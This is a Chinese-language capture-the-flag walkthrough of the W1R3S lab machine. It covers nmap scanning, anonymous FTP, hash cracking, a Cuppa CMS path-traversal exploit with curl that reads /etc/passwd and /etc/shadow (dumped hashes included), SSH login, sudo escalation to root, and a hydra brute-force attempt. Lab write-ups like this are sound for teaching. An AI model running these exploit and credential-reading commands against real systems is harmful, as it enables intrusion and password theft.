w1r3s 靶机学习

w1r3s 靶机学习

0x01 IP

C for command

kali ip

10.10.10.128

victim ip

10.10.10.129

0x02 开扫

C

c 复制代码
sudo nmap -sn 10.10.10.0/24

-sn 多一步入侵和轻量级侦察 发送四项请求

-sL 列表扫描,多用于探测可用ip,广播扫描

--send-ip 时间戳请求,主机发现

C

c 复制代码
sudo nmap -sT --min-rate 10000 -p- 10.10.10.129 -oA nmapscan/ports

默认参数-sS,只发送第一次握手包

-sT三次握手,更稳妥

--min-rate 速度

-p- 扫描1到65535端口

-oA 输出全格式报告

C

c 复制代码
ls -liah nmapscan 

.gnmap 老格式,不推荐

.nmap 和终端一致的格式

.xml 不用多说

C

c 复制代码
ports=$(grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')

/为分隔符

s指定一行

d指定分隔符

C

c 复制代码
sudo nmap -sT -sV -sC -O -p 21,22,80,3306 10.10.10.129 -oA nmapscan/detail

-sT tcp协议

-sV 探测服务版本

-sC 使用默认脚本扫描

-O 探测操作系统

C

c 复制代码
sudo nmap -sU --top-ports 20 10.10.10.129 -oA nmapscan/udp

-sU UDP扫描

udp速度块

C

c 复制代码
sudo nmap --script=vuln -p21,80,22,3306 10.10.10.129 -oA nmapscan/vuln

默认漏洞脚本扫描

detail结果比较重要,优先看

22端口 优先性较差

21,3306,80

扫描顺序:

端口扫面 确定开放端口

详细信息扫描 看细节

udp扫描

漏洞脚本扫描

0x03 开始渗透

C

c 复制代码
ftp 10.10.10.129

username: anonymous

password:

C

c 复制代码
binary

switching to binary mode

细节

C

c 复制代码
prompt

关闭ftp中的交互提示

C

c 复制代码
cd content
mget *.txt

m for multi

下载文件

C

c 复制代码
quit

观察

C

c 复制代码
cat *.txt 

new ftp server for w1r3s.inc

.inc for incorporation

leet speak

T

c 复制代码
hash-identifier

识别

C

c 复制代码
john md5.hash

破解01ec2d8fc11c493b25029fb1f47f39ce

C

c 复制代码
echo -n 'This is not a password' | md5sum

看看加密一次是不是md5密文

看着像base 64

SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==

It is easy, but not that easy...

C

c 复制代码
echo -n "SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==" | base64 -d

-d for decode

看看这段员工列表

The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

几个员工信息,全靠猜

C

c 复制代码
mysql -h 10.10.10.129 -u root -p

数据库没连成

C

c 复制代码
sudo gobuster dir -u http://10.10.10.129 --wordlist=/user/share/dirbuster/wordlists/dirctory-list-2.3-medium.txt

(有点小问题)

爆出一个目录

http://10.10.10.129/administrator/installation/

没收获

C

c 复制代码
searchsploit cuppa cms

C

c 复制代码
searchsploit cuppa -m 25971

-m for mirror

download as 25971.txt

看到利用路径

10.10.10.129/administrator/alerts/alertConfigField.php

cms

https://github.com/CuppaCMS/CuppaCMS

/alerts/alertConfigField.php

C

c 复制代码
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://10.10.10.129/administrator/alerts/alertConfigField.php

x表示用户密码的哈希存储在shadow中

C

c 复制代码
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/shadow' http://10.10.10.129/administrator/alerts/alertConfigField.php

shadow文件

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
bin:*:17379:0:99999:7:::
sys:*:17379:0:99999:7:::
sync:*:17379:0:99999:7:::
games:*:17379:0:99999:7:::
man:*:17379:0:99999:7:::
lp:*:17379:0:99999:7:::
mail:*:17379:0:99999:7:::
news:*:17379:0:99999:7:::
uucp:*:17379:0:99999:7:::
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
list:*:17379:0:99999:7:::
irc:*:17379:0:99999:7:::
gnats:*:17379:0:99999:7:::
nobody:*:17379:0:99999:7:::
systemd-timesync:*:17379:0:99999:7:::
systemd-network:*:17379:0:99999:7:::
systemd-resolve:*:17379:0:99999:7:::
systemd-bus-proxy:*:17379:0:99999:7:::
syslog:*:17379:0:99999:7:::
_apt:*:17379:0:99999:7:::
messagebus:*:17379:0:99999:7:::
uuidd:*:17379:0:99999:7:::
lightdm:*:17379:0:99999:7:::
whoopsie:*:17379:0:99999:7:::
avahi-autoipd:*:17379:0:99999:7:::
avahi:*:17379:0:99999:7:::
dnsmasq:*:17379:0:99999:7:::
colord:*:17379:0:99999:7:::
speech-dispatcher:!:17379:0:99999:7:::
hplip:*:17379:0:99999:7:::
kernoops:*:17379:0:99999:7:::
pulse:*:17379:0:99999:7:::
rtkit:*:17379:0:99999:7:::
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
sshd:*:17554:0:99999:7:::
ftp:*:17554:0:99999:7:::
mysql:!:17554:0:99999:7:::

留下这三个

root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

看看w1r3s用户是什么权限

C

c 复制代码
sudo ssh w1r3s@10.10.10.129

输入密码computer 成了

C

c 复制代码
id
uname -a
sudo -l
sudo /bin/bash
whoami
id

试试ssh暴力破解

C

c 复制代码
hydra -L user.list -P /usr/share/wordlists/rockyou.txt ssh//10.10.10.129 -t 4

不成,不知道为啥

推测hydra的版本问题

不过不推荐ssh爆破

相关推荐
fnd_LN2 分钟前
Linux文件目录 --- mkdir命令,创建目录,多级目录,设置目录权限
linux·运维·服务器
达帮主19 分钟前
7.C语言 宏(Macro) 宏定义,宏函数
linux·c语言·算法
行思理31 分钟前
Linux 下SVN新手操作手册
linux·运维·svn
初学者丶一起加油43 分钟前
C语言基础:指针(数组指针与指针数组)
linux·c语言·开发语言·数据结构·c++·算法·visual studio
百流1 小时前
scala基础学习_运算符
开发语言·学习·scala
百流1 小时前
scala基础学习(数据类型)-数组
开发语言·学习·scala
一只搬砖的猹1 小时前
cJson系列——常用cJson库函数
linux·前端·javascript·python·物联网·mysql·json
虾球xz1 小时前
游戏引擎学习第61天
java·学习·游戏引擎
IPdodo全球网络服务2 小时前
如何通过TikTok引流到私域流量池
运维·服务器·网络
三万棵雪松2 小时前
3.系统学习-熵与决策树
学习·算法·决策树